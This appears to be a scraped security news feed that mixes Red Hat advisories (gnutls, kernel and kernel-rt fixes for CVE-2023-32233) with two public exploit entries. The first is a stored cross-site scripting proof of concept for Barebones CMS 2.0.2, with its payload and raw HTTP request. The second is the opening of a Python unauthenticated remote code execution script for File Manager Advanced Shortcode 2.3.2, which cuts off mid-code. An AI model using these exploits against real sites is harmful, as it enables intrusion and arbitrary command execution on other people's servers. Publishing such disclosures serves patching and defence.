gnutls-dane-3.6.16-5.el8_6.1.ppc64le.rpm  
gnutls-dane-debuginfo-3.6.16-5.el8_6.1.ppc64le.rpm  
gnutls-debuginfo-3.6.16-5.el8_6.1.ppc64le.rpm  
gnutls-debugsource-3.6.16-5.el8_6.1.ppc64le.rpm  
gnutls-devel-3.6.16-5.el8_6.1.ppc64le.rpm  
gnutls-utils-3.6.16-5.el8_6.1.ppc64le.rpm  
gnutls-utils-debuginfo-3.6.16-5.el8_6.1.ppc64le.rpm

s390x:  
gnutls-c++-3.6.16-5.el8_6.1.s390x.rpm  
gnutls-c++-debuginfo-3.6.16-5.el8_6.1.s390x.rpm  
gnutls-dane-3.6.16-5.el8_6.1.s390x.rpm  
gnutls-dane-debuginfo-3.6.16-5.el8_6.1.s390x.rpm  
gnutls-debuginfo-3.6.16-5.el8_6.1.s390x.rpm  
gnutls-debugsource-3.6.16-5.el8_6.1.s390x.rpm  
gnutls-devel-3.6.16-5.el8_6.1.s390x.rpm  
gnutls-utils-3.6.16-5.el8_6.1.s390x.rpm  
gnutls-utils-debuginfo-3.6.16-5.el8_6.1.s390x.rpm

x86_64:  
gnutls-c++-3.6.16-5.el8_6.1.i686.rpm  
gnutls-c++-3.6.16-5.el8_6.1.x86_64.rpm  
gnutls-c++-debuginfo-3.6.16-5.el8_6.1.i686.rpm  
gnutls-c++-debuginfo-3.6.16-5.el8_6.1.x86_64.rpm  
gnutls-dane-3.6.16-5.el8_6.1.i686.rpm  
gnutls-dane-3.6.16-5.el8_6.1.x86_64.rpm  
gnutls-dane-debuginfo-3.6.16-5.el8_6.1.i686.rpm  
gnutls-dane-debuginfo-3.6.16-5.el8_6.1.x86_64.rpm  
gnutls-debuginfo-3.6.16-5.el8_6.1.i686.rpm  
gnutls-debuginfo-3.6.16-5.el8_6.1.x86_64.rpm  
gnutls-debugsource-3.6.16-5.el8_6.1.i686.rpm  
gnutls-debugsource-3.6.16-5.el8_6.1.x86_64.rpm  
gnutls-devel-3.6.16-5.el8_6.1.i686.rpm  
gnutls-devel-3.6.16-5.el8_6.1.x86_64.rpm  
gnutls-utils-3.6.16-5.el8_6.1.x86_64.rpm  
gnutls-utils-debuginfo-3.6.16-5.el8_6.1.i686.rpm  
gnutls-utils-debuginfo-3.6.16-5.el8_6.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
gnutls-3.6.16-5.el8_6.1.src.rpm

aarch64:  
gnutls-3.6.16-5.el8_6.1.aarch64.rpm  
gnutls-c++-debuginfo-3.6.16-5.el8_6.1.aarch64.rpm  
gnutls-dane-debuginfo-3.6.16-5.el8_6.1.aarch64.rpm  
gnutls-debuginfo-3.6.16-5.el8_6.1.aarch64.rpm  
gnutls-debugsource-3.6.16-5.el8_6.1.aarch64.rpm  
gnutls-utils-debuginfo-3.6.16-5.el8_6.1.aarch64.rpm

ppc64le:  
gnutls-3.6.16-5.el8_6.1.ppc64le.rpm  
gnutls-c++-debuginfo-3.6.16-5.el8_6.1.ppc64le.rpm  
gnutls-dane-debuginfo-3.6.16-5.el8_6.1.ppc64le.rpm  
gnutls-debuginfo-3.6.16-5.el8_6.1.ppc64le.rpm  
gnutls-debugsource-3.6.16-5.el8_6.1.ppc64le.rpm  
gnutls-utils-debuginfo-3.6.16-5.el8_6.1.ppc64le.rpm

s390x:  
gnutls-3.6.16-5.el8_6.1.s390x.rpm  
gnutls-c++-debuginfo-3.6.16-5.el8_6.1.s390x.rpm  
gnutls-dane-debuginfo-3.6.16-5.el8_6.1.s390x.rpm  
gnutls-debuginfo-3.6.16-5.el8_6.1.s390x.rpm  
gnutls-debugsource-3.6.16-5.el8_6.1.s390x.rpm  
gnutls-utils-debuginfo-3.6.16-5.el8_6.1.s390x.rpm

x86_64:  
gnutls-3.6.16-5.el8_6.1.i686.rpm  
gnutls-3.6.16-5.el8_6.1.x86_64.rpm  
gnutls-c++-debuginfo-3.6.16-5.el8_6.1.i686.rpm  
gnutls-c++-debuginfo-3.6.16-5.el8_6.1.x86_64.rpm  
gnutls-dane-debuginfo-3.6.16-5.el8_6.1.i686.rpm  
gnutls-dane-debuginfo-3.6.16-5.el8_6.1.x86_64.rpm  
gnutls-debuginfo-3.6.16-5.el8_6.1.i686.rpm  
gnutls-debuginfo-3.6.16-5.el8_6.1.x86_64.rpm  
gnutls-debugsource-3.6.16-5.el8_6.1.i686.rpm  
gnutls-debugsource-3.6.16-5.el8_6.1.x86_64.rpm  
gnutls-utils-debuginfo-3.6.16-5.el8_6.1.i686.rpm  
gnutls-utils-debuginfo-3.6.16-5.el8_6.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHsDqNzjgjWX9erEAQjn2RAAjWveyFzvj+lzp5u7m+6iMUpgMMX7i9JQ  
zr9YwVRWbtZZcGcUXqgbyqbDoj7lBZbd4eyQ7GKfeNATEjiQUUTsBvHj+DSHACXg  
2gjxgZw3rPE1TsNeOu85ztWJyLMuoMXQQOBvuZkEF7/kSN9l1OihqfdGEMJvqCk5  
EiZgrFFAZjyFdyUOeNO4uuFArIOqkBtgVl7aBN1xX0PbgN2hBVURBrl/N0o+yX7q  
XdRJF4p+2JCSKqCg6XgTHI/R6GNtP68aF8aA1Eb2hTVxXCqSuDk56Qw2UMSUDPGz  
6AZmKc3w7qcqyshY4npnbDGBTTL7LtLrZifg7DZ6HoRM/Q+E7vzEH6O8j1Udq3KT  
wlXcBkuJpkUZXzB9D7lg4IQhrt9iTNhegQzgCmr748FHsCBtW+6b/NvAy41dkU7X  
UCTwjeWcOA9YIp1csjM9s9juZd/gQjPSsk557Hp0j3AQ9etYGPc7B9iBnwqA6YYo  
R4h4qntmsntj46Sgfrc+05gQ5quL6OJV0WuWynOgI0KW4AhicRncbP9mUOj/tO6A  
g6e2BrPSjtH8o/rxdzA/M6BI60iylWGac7K7dNL3VXVn4L01dZFiyZDGjtAJaKSQ  
fmnNTv1ny899LY6ncaei/bT6OpbYbu2FMeT0Y18Jyo51pcLy/8xuL00RUSeNH+o0  
WMPOzJTA4CQ=  
=CQ+c  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3361-01

Barebones CMS version 2.0.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)# Date: 2023-06-03# Exploit Author: tmrswrr# Vendor Homepage: https://barebonescms.com/# Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip# Version: v2.0.2# Tested : https://demo.barebonescms.com/--- Description ---1) Login admin panel and go to new story : https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c011843235402) Click edit button and  write your payload in the title field:Payload: "><script>alert(1)</script>3) After save change and will you see alert buttonPOST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1Host: demo.barebonescms.comCookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 237Origin: https://demo.barebonescms.comDnt: 1Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeaction=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=

Barebones CMS 2.0.2 Cross Site Scripting

Red Hat Security Advisory 2023-3349-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:3349-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3349  
Issue date:        2023-05-30  
CVE Names:         CVE-2023-32233   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: netfilter: use-after-free in nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* The qede driver changes rx-usecs: to 256 causing performance impact  
(BZ#2176104)

* Intel QAT Update - (kernel changes) (BZ#2176850)

* In FIPS mode, kernel does not transition into error state when RCT or APT  
health tests fail (BZ#2181730)

* "smpboot: Scheduler frequency invariance went wobbly, disabling!" on  
nohz_full CPUs after long run (BZ#2188067)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kernel-4.18.0-477.13.1.el8_8.src.rpm

aarch64:  
bpftool-4.18.0-477.13.1.el8_8.aarch64.rpm  
bpftool-debuginfo-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-core-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-cross-headers-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-debug-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-debug-core-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-debug-devel-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-debug-modules-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-debuginfo-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-devel-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-headers-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-modules-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-modules-extra-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-tools-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-tools-libs-4.18.0-477.13.1.el8_8.aarch64.rpm  
perf-4.18.0-477.13.1.el8_8.aarch64.rpm  
perf-debuginfo-4.18.0-477.13.1.el8_8.aarch64.rpm  
python3-perf-4.18.0-477.13.1.el8_8.aarch64.rpm  
python3-perf-debuginfo-4.18.0-477.13.1.el8_8.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-477.13.1.el8_8.noarch.rpm  
kernel-doc-4.18.0-477.13.1.el8_8.noarch.rpm

ppc64le:  
bpftool-4.18.0-477.13.1.el8_8.ppc64le.rpm  
bpftool-debuginfo-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-core-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-cross-headers-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-debug-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-debug-core-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-debug-devel-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-debug-modules-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-debuginfo-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-devel-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-headers-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-modules-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-modules-extra-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-tools-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-tools-libs-4.18.0-477.13.1.el8_8.ppc64le.rpm  
perf-4.18.0-477.13.1.el8_8.ppc64le.rpm  
perf-debuginfo-4.18.0-477.13.1.el8_8.ppc64le.rpm  
python3-perf-4.18.0-477.13.1.el8_8.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-477.13.1.el8_8.ppc64le.rpm

s390x:  
bpftool-4.18.0-477.13.1.el8_8.s390x.rpm  
bpftool-debuginfo-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-core-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-cross-headers-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-debug-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-debug-core-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-debug-debuginfo-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-debug-devel-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-debug-modules-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-debug-modules-extra-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-debuginfo-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-devel-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-headers-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-modules-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-modules-extra-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-tools-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-tools-debuginfo-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-zfcpdump-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-zfcpdump-core-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-477.13.1.el8_8.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-477.13.1.el8_8.s390x.rpm  
perf-4.18.0-477.13.1.el8_8.s390x.rpm  
perf-debuginfo-4.18.0-477.13.1.el8_8.s390x.rpm  
python3-perf-4.18.0-477.13.1.el8_8.s390x.rpm  
python3-perf-debuginfo-4.18.0-477.13.1.el8_8.s390x.rpm

x86_64:  
bpftool-4.18.0-477.13.1.el8_8.x86_64.rpm  
bpftool-debuginfo-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-core-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-cross-headers-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-debug-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-debug-core-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-debug-devel-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-debug-modules-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-debuginfo-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-devel-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-headers-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-modules-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-modules-extra-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-tools-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-tools-libs-4.18.0-477.13.1.el8_8.x86_64.rpm  
perf-4.18.0-477.13.1.el8_8.x86_64.rpm  
perf-debuginfo-4.18.0-477.13.1.el8_8.x86_64.rpm  
python3-perf-4.18.0-477.13.1.el8_8.x86_64.rpm  
python3-perf-debuginfo-4.18.0-477.13.1.el8_8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64:  
bpftool-debuginfo-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-debuginfo-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-477.13.1.el8_8.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-477.13.1.el8_8.aarch64.rpm  
perf-debuginfo-4.18.0-477.13.1.el8_8.aarch64.rpm  
python3-perf-debuginfo-4.18.0-477.13.1.el8_8.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-debuginfo-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-477.13.1.el8_8.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-477.13.1.el8_8.ppc64le.rpm  
perf-debuginfo-4.18.0-477.13.1.el8_8.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-477.13.1.el8_8.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-debuginfo-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-477.13.1.el8_8.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-477.13.1.el8_8.x86_64.rpm  
perf-debuginfo-4.18.0-477.13.1.el8_8.x86_64.rpm  
python3-perf-debuginfo-4.18.0-477.13.1.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHsDYtzjgjWX9erEAQhP/Q//Wp1Dlnoej5nn+A3NcfJm7Mccpbl+0Ioj  
ynx6WhJID1lPAwwVJ5b3pRG4J+P7CJnzBm5BoMskkX+zDGrGOUduZM6Ls0/Kc47L  
MfWWZK7CtYgOnJ7MbKIAWittpCwvYGRb1R21tQD6Q7ygsfEphxfKkoFt+Vl0Bb4I  
bPCrYFZxBvXV5U0GYe46WI7b+L8ZW39JVsKHd3q9n/dO7mlByVzhLNf+FUFv8DI4  
+8+gU5K0egJlj2aMRY/D3H2Alnrb8StuYkhPmtdZGFoncELHtR3B1iDXbzijotOk  
oE/zaVKMPOI23Z8JywTFTTkENYzTcrW4PjCGnRYU9ctPcXqSuuiWVUbTnch0El5g  
7o/2BOx+RRhsJx9hzROI+dGBj4EkD2lS+OKzKtuZtW0wjUSfNS5IzDX+bfbrecPj  
HBJo7F11Zr7B1GPwI3zPITJKBYht+uW8bUHtk4gofvyZssRiu+75s2v2y8/OQZU3  
dboDexak5k33cmBXDvVzEKcBXwFqAG9/ySMgO4Mlo4VDgitbE6YwRzeos87RDNBV  
3iRMv7ELr5OgRrVIykN0jVs3J6rQwieJDqk0OqDl8lSDOdrUy/CcuSI8jRYmiUQF  
czA/FhT+icp6hj4blruU768FiMoPlj12oUa0b2zJhDPw0lP8T6Qbtqj2625EeInm  
SC8SJ3kdb64=  
=3eCl  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3349-01

Red Hat Security Advisory 2023-3350-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:3350-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3350  
Issue date:        2023-05-30  
CVE Names:         CVE-2023-32233   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux NFV (v. 8) - x86_64  
Red Hat Enterprise Linux RT (v. 8) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: netfilter: use-after-free in nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* smpboot: Scheduler frequency invariance went wobbly, disabling!  
(BZ#2188316)

* Crash: kernel BUG at kernel/locking/rtmutex.c:1338! (BZ#2188722)

* kernel-rt: update RT source tree to the RHEL-8.8.z0 source tree.  
(BZ#2196667)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux NFV (v. 8):

Source:  
kernel-rt-4.18.0-477.13.1.rt7.276.el8_8.src.rpm

x86_64:  
kernel-rt-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-core-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debug-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debug-core-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-devel-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-kvm-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-modules-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm

Red Hat Enterprise Linux RT (v. 8):

Source:  
kernel-rt-4.18.0-477.13.1.rt7.276.el8_8.src.rpm

x86_64:  
kernel-rt-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-core-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debug-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debug-core-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-devel-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-modules-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-477.13.1.rt7.276.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHsDctzjgjWX9erEAQg/+BAAgmI/YC7PRQEuaQHyXaQFLZcX2Rb/zt06  
MkmZfYDDMDkt7A/VobC7M56ji/PjmEyvMZemCpNGadff/OTGDyDr6hubVOyscrmm  
k6zLXk5ZrZKdIyPJmsBPcvCzoBDChQ0+q/9XdmBcds4+ogeqTImq3qjgkC660Ml1  
PtJvKY4/tYl5GVhrXrCIzBDFO1w4GHYwKY+0sd/k/HYXhIr3LlD0Fxs5RQoKr8w7  
Ql9vq6CX8g15xLqt2K0Ene/0dCSxiwslb4zktnMn2Xu5uum8mFxCJ7k5DAFCnc1h  
83qtOGpakKC1+c88rSEM67GtUijuJnBkZXwQMPNO/KmTG//mOniYfJr2ZnBa+Grx  
xT+Cm7velHhDDCEYx0RmSWgafrn25wbqzdZ1jJEehRpm6RgsmvC1tTkCg1KQkIEn  
n9aLt7P6XDgTj2EoBaDAvO1S2C6lpKAUYlFxhvEjM5o/RWOMBtNthT6sg6T+V3bZ  
YwGlN2ynBNjvcVBzZdv+SxJPo0xNBZgZ4Au6DcVYcH9OGuv11WlCsMrK/a2sU+nF  
nvjWYIKGg4rKepeB5mI1XT2pKOtXc76oTW6MZkbb1Y+fD3N38rnw/X2RrNFIJXFj  
6PGLY1E2wzlco7tfxoQ3TWDo+N2zRId6PySqMO4zAtfFNl/GcRBdoZxa0zJD7fiC  
OtKPnaiDzuc=  
=DGEr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3350-01

File Manager Advanced Shortcode version 2.3.2 suffers from a remote code execution vulnerability.

    # Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)# Date: 05/31/2023# Exploit Author: Mateus Machado Tesser# Vendor Homepage: https://advancedfilemanager.com/# Version: File Manager Advanced Shortcode 2.3.2# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15# CVE: CVE-2023-2068import requestsimport jsonimport pprintimport sysimport rePROCESS = "\033[1;34;40m[*]\033[0m"SUCCESS = "\033[1;32;40m[+]\033[0m"FAIL = "\033[1;31;40m[-]\033[0m"try:  COMMAND = sys.argv[2]  IP = sys.argv[1]  if len(COMMAND) > 1:    pass  if IP:    pass  else:    print(f'Use: {sys.argv[0]} IP COMMAND')except:  passurl = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panelprint(f"{PROCESS} Searching fmakey")try:  r = requests.get(url)  raw_fmakey = r.text  fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]  if len(fmakey) 